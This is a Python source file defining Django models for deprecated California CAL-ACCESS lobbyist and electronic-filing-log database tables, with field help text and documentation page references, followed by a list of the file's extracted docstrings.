db_table = 'LOBBYIST_EMPLOYER_FIRMS1_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.employer_id)
@python_2_unicode_compatible
class LobbyistEmployerFirms2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMPLOYER_FIRMS1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
    Also, the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=96),
]
employer_id = fields.IntegerField(
db_column='EMPLOYER_ID',
help_text="Employer identification number",
verbose_name="Employer ID"
)
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
termination_dt = fields.CharField(
verbose_name='termination date',
db_column='TERMINATION_DT',
max_length=32,
blank=True,
help_text="Termination effective date"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMPLOYER_FIRMS2_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.employer_id)
@python_2_unicode_compatible
class LobbyistEmployerHistoryCd(CalAccessBaseModel):
"""
Undocumented.
An empty file of the same name is included in the Secretary of State's daily CAL-ACCESS database exports.
This table is documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation
on these tables. Cox 5/11/2000".
Also, the columns on this table are identical to the columns on the
LOBBYIST_EMPLOYER1_CD, LOBBYIST_EMPLOYER2_CD and LOBBYIST_EMPLOYER3_CD
tables.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=96, end_page=97),
]
contributor_id = fields.IntegerField(
db_column="CONTRIBUTOR_ID",
help_text="Contributor identification number."
)
current_qtr_amt = fields.IntegerField(
db_column="CURRENT_QTR_AMT",
help_text="Current Quarter Amount"
)
employer_id = fields.IntegerField(
db_column="EMPLOYER_ID",
help_text="Employer identification number."
)
employer_name = fields.CharField(
db_column="EMPLOYER_NAME",
max_length=300,
blank=True,
help_text="Employer Name"
)
INTEREST_CD_CHOICES = (
(40301, 'AGRICULTURE'),
(40302, 'EDUCATION'),
(40303, 'ENTERTAINMENT/RECREATION'),
(40304, 'FINANCE/INSURANCE'),
(40305, 'GOVERNMENT'),
(40306, 'HEALTH'),
(40307, 'LABOR UNIONS'),
(40308, 'LEGAL'),
(40309, 'LODGING/RESTAURANTS'),
(40310, 'MANUFACTURING/INDUSTRIAL'),
(40311, 'MERCHANDISE/RETAIL'),
(40312, 'MISCELLANEOUS'),
(40313, 'OIL AND GAS'),
(40314, 'POLITICAL ORGANIZATIONS'),
(40315, 'PROFESSIONAL/TRADE'),
(40316, 'PUBLIC EMPLOYEES'),
(40317, 'REAL ESTATE'),
(40318, 'TRANSPORTATION'),
(40319, 'UTILITIES'),
)
interest_cd = fields.IntegerField(
db_column="INTEREST_CD",
choices=INTEREST_CD_CHOICES,
verbose_name='interest code',
help_text='Interest Code',
documentcloud_pages=[
DocumentCloud(id='2774529-Lookup-Codes-Cd', start_page=19),
],
)
interest_name = fields.CharField(
db_column="INTEREST_NAME",
max_length=300,
blank=True,
verbose_name="Interest name.",
help_text="Interest name.",
)
qtr_1 = fields.IntegerField(
db_column="QTR_1",
verbose_name="quarter 1 amount",
help_text="Quarter 1 total amount.",
)
qtr_2 = fields.IntegerField(
db_column="QTR_2",
verbose_name="quarter 2 amount.",
help_text="Quarter 2 total amount.",
)
qtr_3 = fields.IntegerField(
db_column="QTR_3",
verbose_name="quarter 3 amount",
help_text="Quarter 3 total amount.",
)
qtr_4 = fields.IntegerField(
db_column="QTR_4",
verbose_name="quarter 4 amount",
help_text="Quarter 4 total amount.",
)
qtr_5 = fields.IntegerField(
db_column="QTR_5",
verbose_name="quarter 5 amount5",
help_text="Quarter 5 total amount.",
)
qtr_6 = fields.IntegerField(
db_column="QTR_6",
verbose_name="quarter 6 amount.",
help_text="Quarter 6 total amount.",
)
qtr_7 = fields.IntegerField(
db_column="QTR_7",
verbose_name="quarter 7 amount.",
help_text="Quarter 7 total amount.",
)
qtr_8 = fields.IntegerField(
db_column="QTR_8",
verbose_name="quarter 8 amount.",
help_text="Quarter 8 total amount.",
)
session_id = fields.IntegerField(
db_column="SESSION_ID",
verbose_name="session identification number.",
help_text="Session identification number.",
)
session_total_amt = fields.IntegerField(
db_column="SESSION_TOTAL_AMT",
verbose_name="session total amount",
help_text="Total amount for the session.",
)
session_yr_1 = fields.IntegerField(
db_column="SESSION_YR_1",
verbose_name="session year 1",
help_text="Total amount for year 1 of the session.",
)
session_yr_2 = fields.IntegerField(
db_column="SESSION_YR_2",
verbose_name="session year 2",
help_text="Total amount for year 2 of the session.",
)
yr_1_ytd_amt = fields.IntegerField(
db_column="YR_1_YTD_AMT",
help_text="Year 1 year to date amount.",
)
yr_2_ytd_amt = fields.IntegerField(
db_column="YR_2_YTD_AMT",
help_text="Year 2 year to date amount.",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_EMPLOYER_HISTORY_CD'
def __str__(self):
return str(self.contributor_id)
@python_2_unicode_compatible
class LobbyistFirm1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM2_CD and LOBBYIST_FIRM3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_YR_1 values are 2001, and the distinct SESSION_YR_2
are 2002.
"""
UNIQUE_KEY = False
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=103, end_page=104),
]
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
current_qtr_amt = fields.FloatField(
db_column='CURRENT_QTR_AMT',
help_text="Current quarter amount"
)
session_total_amt = fields.FloatField(
db_column='SESSION_TOTAL_AMT',
help_text="Total amount for the session"
)
contributor_id = fields.IntegerField(
db_column='CONTRIBUTOR_ID',
blank=True,
null=True,
verbose_name="contributor ID",
help_text="Contributor identification number"
)
session_yr_1 = fields.IntegerField(
db_column='SESSION_YR_1',
help_text="Total amount of year 1 of the session",
)
session_yr_2 = fields.IntegerField(
db_column='SESSION_YR_2',
help_text="Total amount of year 2 of the session",
)
yr_1_ytd_amt = fields.FloatField(
db_column='YR_1_YTD_AMT',
verbose_name="Year 1 year-to-date-amount",
help_text="Year 1 year-to-date-amount",
)
yr_2_ytd_amt = fields.FloatField(
db_column='YR_2_YTD_AMT',
verbose_name="Year 2 year-to-date-amount",
help_text="Year 2 year-to-date-amount",
)
qtr_1 = fields.FloatField(
db_column='QTR_1',
verbose_name="Quarter 1",
help_text="Quarter total amount",
)
qtr_2 = fields.FloatField(
db_column='QTR_2',
verbose_name="Quarter 2",
help_text="Quarter total amount",
)
qtr_3 = fields.FloatField(
db_column='QTR_3',
verbose_name="Quarter 3",
help_text="Quarter total amount",
)
qtr_4 = fields.FloatField(
db_column='QTR_4',
verbose_name="Quarter 4",
help_text="Quarter total amount",
)
qtr_5 = fields.FloatField(
db_column='QTR_5',
verbose_name="Quarter 5",
help_text="Quarter total amount",
)
qtr_6 = fields.FloatField(
db_column='QTR_6',
verbose_name="Quarter 6",
help_text="Quarter total amount",
)
qtr_7 = fields.FloatField(
db_column='QTR_7',
verbose_name="Quarter 7",
help_text="Quarter total amount",
)
qtr_8 = fields.FloatField(
db_column='QTR_8',
verbose_name="Quarter 8",
help_text="Quarter total amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM1_CD'
def __str__(self):
return str(self.firm_id)
@python_2_unicode_compatible
class LobbyistFirm2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM1_CD and LOBBYIST_FIRM3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_YR_1 values are 2001, and the distinct SESSION_YR_2
are 2002.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=104),
]
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
current_qtr_amt = fields.FloatField(
db_column='CURRENT_QTR_AMT',
help_text="Current quarter amount"
)
session_total_amt = fields.FloatField(
db_column='SESSION_TOTAL_AMT',
help_text="Total amount for the session"
)
contributor_id = fields.IntegerField(
db_column='CONTRIBUTOR_ID',
blank=True,
null=True,
verbose_name="contributor ID",
help_text="Contributor identification number"
)
session_yr_1 = fields.IntegerField(
db_column='SESSION_YR_1',
help_text="Total amount of year 1 of the session",
)
session_yr_2 = fields.IntegerField(
db_column='SESSION_YR_2',
help_text="Total amount of year 2 of the session",
)
yr_1_ytd_amt = fields.FloatField(
db_column='YR_1_YTD_AMT',
verbose_name="Year 1 year-to-date-amount",
help_text="Year 1 year-to-date-amount",
)
yr_2_ytd_amt = fields.FloatField(
db_column='YR_2_YTD_AMT',
verbose_name="Year 2 year-to-date-amount",
help_text="Year 2 year-to-date-amount",
)
qtr_1 = fields.FloatField(
db_column='QTR_1',
verbose_name="Quarter 1",
help_text="Quarter total amount",
)
qtr_2 = fields.FloatField(
db_column='QTR_2',
verbose_name="Quarter 2",
help_text="Quarter total amount",
)
qtr_3 = fields.FloatField(
db_column='QTR_3',
verbose_name="Quarter 3",
help_text="Quarter total amount",
)
qtr_4 = fields.FloatField(
db_column='QTR_4',
verbose_name="Quarter 4",
help_text="Quarter total amount",
)
qtr_5 = fields.FloatField(
db_column='QTR_5',
verbose_name="Quarter 5",
help_text="Quarter total amount",
)
qtr_6 = fields.FloatField(
db_column='QTR_6',
verbose_name="Quarter 6",
help_text="Quarter total amount",
)
qtr_7 = fields.FloatField(
db_column='QTR_7',
verbose_name="Quarter 7",
help_text="Quarter total amount",
)
qtr_8 = fields.FloatField(
db_column='QTR_8',
verbose_name="Quarter 8",
help_text="Quarter total amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM2_CD'
def __str__(self):
return str(self.firm_id)
@python_2_unicode_compatible
class LobbyistFirm3Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM1_CD and LOBBYIST_FIRM2_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_YR_1 values are 2001, and the distinct SESSION_YR_2
are 2002.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=105),
]
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
current_qtr_amt = fields.FloatField(
db_column='CURRENT_QTR_AMT',
help_text="Current quarter amount"
)
session_total_amt = fields.FloatField(
db_column='SESSION_TOTAL_AMT',
help_text="Total amount for the session"
)
contributor_id = fields.IntegerField(
db_column='CONTRIBUTOR_ID',
blank=True,
null=True,
verbose_name="contributor ID",
help_text="Contributor identification number"
)
session_yr_1 = fields.IntegerField(
db_column='SESSION_YR_1',
help_text="Total amount of year 1 of the session",
)
session_yr_2 = fields.IntegerField(
db_column='SESSION_YR_2',
help_text="Total amount of year 2 of the session",
)
yr_1_ytd_amt = fields.FloatField(
db_column='YR_1_YTD_AMT',
verbose_name="Year 1 year-to-date-amount",
help_text="Year 1 year-to-date-amount",
)
yr_2_ytd_amt = fields.FloatField(
db_column='YR_2_YTD_AMT',
verbose_name="Year 2 year-to-date-amount",
help_text="Year 2 year-to-date-amount",
)
qtr_1 = fields.FloatField(
db_column='QTR_1',
verbose_name="Quarter 1",
help_text="Quarter total amount",
)
qtr_2 = fields.FloatField(
db_column='QTR_2',
verbose_name="Quarter 2",
help_text="Quarter total amount",
)
qtr_3 = fields.FloatField(
db_column='QTR_3',
verbose_name="Quarter 3",
help_text="Quarter total amount",
)
qtr_4 = fields.FloatField(
db_column='QTR_4',
verbose_name="Quarter 4",
help_text="Quarter total amount",
)
qtr_5 = fields.FloatField(
db_column='QTR_5',
verbose_name="Quarter 5",
help_text="Quarter total amount",
)
qtr_6 = fields.FloatField(
db_column='QTR_6',
verbose_name="Quarter 6",
help_text="Quarter total amount",
)
qtr_7 = fields.FloatField(
db_column='QTR_7',
verbose_name="Quarter 7",
help_text="Quarter total amount",
)
qtr_8 = fields.FloatField(
db_column='QTR_8',
verbose_name="Quarter 8",
help_text="Quarter total amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM3_CD'
def __str__(self):
return str(self.firm_id)
@python_2_unicode_compatible
class LobbyistFirmEmployer1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_EMPLOYER2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
    Also, RPT_START and RPT_END each contain only one distinct value, "2001-04-01"
and "2001-06-30", respectively.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=100),
]
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
filing_id = fields.IntegerField(
db_column='FILING_ID',
db_index=True,
verbose_name='filing ID',
help_text="Unique filing identification number"
)
filing_sequence = fields.IntegerField(
db_column='FILING_SEQUENCE',
help_text="Amendment number. 0 is the original filing. \
1 to 999 are amendments"
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
rpt_start = fields.DateField(
db_column='RPT_START',
null=True,
help_text="Starting date for the period the report covers"
)
rpt_end = fields.DateField(
db_column='RPT_END',
null=True,
help_text="Ending date for the period the report covers"
)
per_total = fields.FloatField(
db_column='PER_TOTAL',
help_text="Total this reporting period"
)
cum_total = fields.FloatField(
db_column='CUM_TOTAL',
help_text='Cumulative total to date'
)
lby_actvty = fields.CharField(
db_column='LBY_ACTVTY',
max_length=182,
blank=True,
help_text="Description of lobbying activity"
)
ext_lby_actvty = fields.CharField(
db_column='EXT_LBY_ACTVTY',
max_length=32,
blank=True,
help_text="This field is undocumented"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM_EMPLOYER1_CD'
ordering = ("-rpt_start",)
def __str__(self):
return str(self.firm_id)
@python_2_unicode_compatible
class LobbyistFirmEmployer2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_EMPLOYER1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
    Also, RPT_START and RPT_END each contain only one distinct value, "2001-04-01"
and "2001-06-30", respectively.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=11, end_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=100, end_page=101),
]
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
filing_id = fields.IntegerField(
db_column='FILING_ID',
db_index=True,
verbose_name='filing ID',
help_text="Unique filing identification number"
)
filing_sequence = fields.IntegerField(
db_column='FILING_SEQUENCE',
help_text="Amendment number. 0 is the original filing. \
1 to 999 are amendments"
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
employer_name = fields.CharField(
db_column='EMPLOYER_NAME',
max_length=300,
help_text="Employer name"
)
rpt_start = fields.DateField(
db_column='RPT_START',
null=True,
help_text="Starting date for the period the report covers"
)
rpt_end = fields.DateField(
db_column='RPT_END',
null=True,
help_text="Ending date for the period the report covers"
)
per_total = fields.FloatField(
db_column='PER_TOTAL',
help_text="Total this reporting period"
)
cum_total = fields.FloatField(
db_column='CUM_TOTAL',
help_text='Cumulative total to date'
)
lby_actvty = fields.CharField(
db_column='LBY_ACTVTY',
max_length=182,
blank=True,
help_text="Description of lobbying activity"
)
ext_lby_actvty = fields.CharField(
db_column='EXT_LBY_ACTVTY',
max_length=32,
blank=True,
help_text="This field is undocumented"
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM_EMPLOYER2_CD'
ordering = ("-rpt_start",)
def __str__(self):
return str(self.filing_id)
@python_2_unicode_compatible
class LobbyistFirmHistoryCd(CalAccessBaseModel):
"""
Undocumented.
An empty file of the same name is included in the Secretary of State's daily CAL-ACCESS database exports.
This table is documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation
on these tables. Cox 5/11/2000".
Also, the columns on this table are identical to the columns on the
LOBBYIST_FIRM1_CD, LOBBYIST_FIRM2_CD and LOBBYIST_FIRM3_CD tables.
"""
UNIQUE_KEY = (
)
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=101, end_page=102),
]
contributor_id = fields.IntegerField(
db_column="CONTRIBUTOR_ID",
help_text="Contributor identification number."
)
current_qtr_amt = fields.IntegerField(
db_column="CURRENT_QTR_AMT",
help_text="Current Quarter Amount"
)
firm_id = fields.IntegerField(
db_column="FIRM_ID",
help_text="Identification number of the Firm/Employer/Coalition."
)
firm_name = fields.CharField(
db_column="FIRM_NAME",
max_length=300,
help_text="Name of Firm/Employer/Coalition"
)
qtr_1 = fields.IntegerField(
db_column="QTR_1",
help_text="Quarter total amount."
)
qtr_2 = fields.IntegerField(
db_column="QTR_2",
help_text="Quarter total amount."
)
qtr_3 = fields.IntegerField(
db_column="QTR_3",
help_text="Quarter total amount."
)
qtr_4 = fields.IntegerField(
db_column="QTR_4",
help_text="Quarter total amount."
)
qtr_5 = fields.IntegerField(
db_column="QTR_5",
help_text="Quarter total amount."
)
qtr_6 = fields.IntegerField(
db_column="QTR_6",
help_text="Quarter total amount."
)
qtr_7 = fields.IntegerField(
db_column="QTR_7",
help_text="Quarter total amount."
)
qtr_8 = fields.IntegerField(
db_column="QTR_8",
help_text="Quarter total amount."
)
session_id = fields.IntegerField(
db_column="SESSION_ID",
help_text="Session identification number."
)
session_total_amt = fields.IntegerField(
db_column="SESSION_TOTAL_AMT",
help_text="Total amount for the session."
)
session_yr_1 = fields.IntegerField(
db_column="SESSION_YR_1",
help_text="Total amount for year 1 of the session."
)
session_yr_2 = fields.IntegerField(
db_column="SESSION_YR_2",
help_text="Total amount for year 2 of the session."
)
yr_1_ytd_amt = fields.IntegerField(
db_column="YR_1_YTD_AMT",
verbose_name="Year 1 year to date amount.",
help_text="Year 1 year to date amount.",
)
yr_2_ytd_amt = fields.IntegerField(
db_column="YR_2_YTD_AMT",
verbose_name="Year 2 year to date amount",
help_text="Year 2 year to date amount",
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM_HISTORY_CD'
def __str__(self):
return str(self.contributor_id)
@python_2_unicode_compatible
class LobbyistFirmLobbyist1Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_LOBBYIST2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, all rows have the same SESSION_ID value: 2001.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=102),
]
lobbyist_id = fields.IntegerField(
db_column='LOBBYIST_ID',
verbose_name="Lobbyist ID",
help_text="Lobbyist identification number"
)
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
lobbyist_last_name = fields.CharField(
db_column='LOBBYIST_LAST_NAME',
max_length=15,
help_text="Lobbyist last name"
)
lobbyist_first_name = fields.CharField(
db_column='LOBBYIST_FIRST_NAME',
max_length=17,
help_text="Lobbyist first name"
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM_LOBBYIST1_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.lobbyist_id)
@python_2_unicode_compatible
class LobbyistFirmLobbyist2Cd(CalAccessBaseModel):
"""
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_LOBBYIST1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, all rows have the same SESSION_ID value: 2001.
"""
UNIQUE_KEY = False
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=12),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=102, end_page=103),
]
lobbyist_id = fields.IntegerField(
db_column='LOBBYIST_ID',
verbose_name="Lobbyist ID",
help_text="Lobbyist identification number"
)
firm_id = fields.IntegerField(
db_column='FIRM_ID',
verbose_name="Firm ID",
help_text="Identification number of the firm, employer or coalition"
)
lobbyist_last_name = fields.CharField(
db_column='LOBBYIST_LAST_NAME',
max_length=15,
help_text="Lobbyist last name"
)
lobbyist_first_name = fields.CharField(
db_column='LOBBYIST_FIRST_NAME',
max_length=17,
help_text="Lobbyist first name"
)
firm_name = fields.CharField(
db_column='FIRM_NAME',
max_length=400,
help_text="Name of firm, employer or coalition",
)
session_id = fields.IntegerField(
verbose_name='session ID',
db_column='SESSION_ID',
help_text='Legislative session identification number',
null=True,
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'LOBBYIST_FIRM_LOBBYIST2_CD'
ordering = ("-session_id",)
def __str__(self):
return str(self.lobbyist_id)
@python_2_unicode_compatible
class EfsFilingLogCd(CalAccessBaseModel):
"""
Logs from the Electronic Filing Subsystem, which accepts and validates electronic filings.
"""
UNIQUE_KEY = (
"FILING_DATE",
"VENDOR"
)
DOCUMENTCLOUD_PAGES = [
DocumentCloud(id='2711624-Overview', start_page=1, end_page=2),
DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=49, end_page=50),
]
FILING_FORMS = [
annotations.get_form('F400'),
annotations.get_form('F401'),
annotations.get_form('F402'),
annotations.get_form('F410'),
annotations.get_form('F425'),
annotations.get_form('F450'),
annotations.get_form('F460'),
annotations.get_form('F461'),
annotations.get_form('F465'),
annotations.get_form('F496'),
annotations.get_form('F497'),
annotations.get_form('F498'),
annotations.get_form('F601'),
annotations.get_form('F602'),
annotations.get_form('F603'),
annotations.get_form('F604'),
annotations.get_form('F606'),
annotations.get_form('F607'),
annotations.get_form('F615'),
annotations.get_form('F625'),
annotations.get_form('F635'),
annotations.get_form('F645'),
]
filing_date = fields.DateField(
db_column='FILING_DATE',
null=True,
help_text="Date of filing"
)
filingstatus = fields.IntegerField(
db_column='FILINGSTATUS',
help_text="Status of filing. This field is described in the docs as being\
VARCHAR. However, its distinct values are 0, 1, 2 and 7.",
)
vendor = fields.CharField(
db_column='VENDOR',
max_length=250,
help_text="Software vendor who submitted the electronic filing"
)
filer_id = fields.CharField(
verbose_name='filer ID',
db_column='FILER_ID',
max_length=250,
blank=True,
db_index=True,
help_text="Filer's unique identification number",
)
FORM_TYPE_CHOICES = tuple([(f.db_value, f.full_title) for f in FILING_FORMS]) + (
('BADFORMAT 253', 'Unknown'),
('form', 'Unknown'),
)
form_type = fields.CharField(
db_column='FORM_TYPE',
max_length=250,
help_text='Name of the source filing form or schedule',
db_index=True,
choices=FORM_TYPE_CHOICES,
verbose_name="form type",
documentcloud_pages=[
DocumentCloud(id='2711624-Overview', start_page=4, end_page=8),
]
)
error_no = fields.CharField(
db_column='ERROR_NO',
max_length=250,
help_text='Most records have a value of "ACCEPTED". Other records include "ERROR"\
or "BADFORMAT" and a three-digit number.',
)
class Meta(CalAccessBaseModel.Meta):
"""
Meta model options.
"""
db_table = 'EFS_FILING_LOG_CD'
ordering = ("-filing_date",)
def __str__(self):
return "{} ({})".format(self.vendor, self.filing_date)
| calaccess_raw/models/inactive.py | 75,087 | Ballot-measure dates and times.
The cover page for officeholder and candidate short and supplemental forms.
Logs from the Electronic Filing Subsystem, which accepts and validates electronic filings.
Undocumented.
The table's official description contains this note: "J M needs to document. This is
in his list of tables designed for future enhancements."
Deprecated table for the disclosure of campaign contributions made by lobbyists.
This table is 95 percent identical to LOBBYIST_CONTRIBUTIONS2_CD and LOBBYIST_CONTRIBUTIONS3_CD.
According to "Cal-Access Tables, Columns, Indexes", this is a temporary
table used to generate the actual Lobbyist contribution disclosure table,
which is LOBBYIST_CONTRIBUTIONS3_CD.
Also, the most recent values observed in FILING_PERIOD_START_DT are for the
April 2001, so probably this table is no longer in use.
Deprecated table for the disclosure of campaign contributions made by lobbyists.
This table is 95 percent identical to LOBBYIST_CONTRIBUTIONS1_CD and LOBBYIST_CONTRIBUTIONS3_CD.
According to "Cal-Access Tables, Columns, Indexes", this is a temporary
table used to generate the actual Lobbyist contribution disclosure table,
which is LOBBYIST_CONTRIBUTIONS3_CD.
Also, the most recent values observed in FILING_PERIOD_START_DT are for the
April 2001, so probably this table is no longer in use.
Deprecated table for the disclosure of campaign contributions made by lobbyists.
This table is 95 percent identical to LOBBYIST_CONTRIBUTIONS1_CD and LOBBYIST_CONTRIBUTIONS2_CD.
According to "Cal-Access Tables, Columns, Indexes", this is the actual
Lobbyist contribution disclosure table generated from the other two
temporary tables: LOBBYIST_CONTRIBUTIONS1_CD and LOBBYIST_CONTRIBUTIONS2_CD.
Also, the most recent values observed in FILING_PERIOD_START_DT are for the
April 2001, so probably this table is no longer in use.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMP_LOBBYIST2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMP_LOBBYIST1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
Deprecated table for the disclosure of lobbyist relationships.
This table is 99 percent identical to LOBBYIST_EMPLOYER2_CD and LOBBYIST_EMPLOYER3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
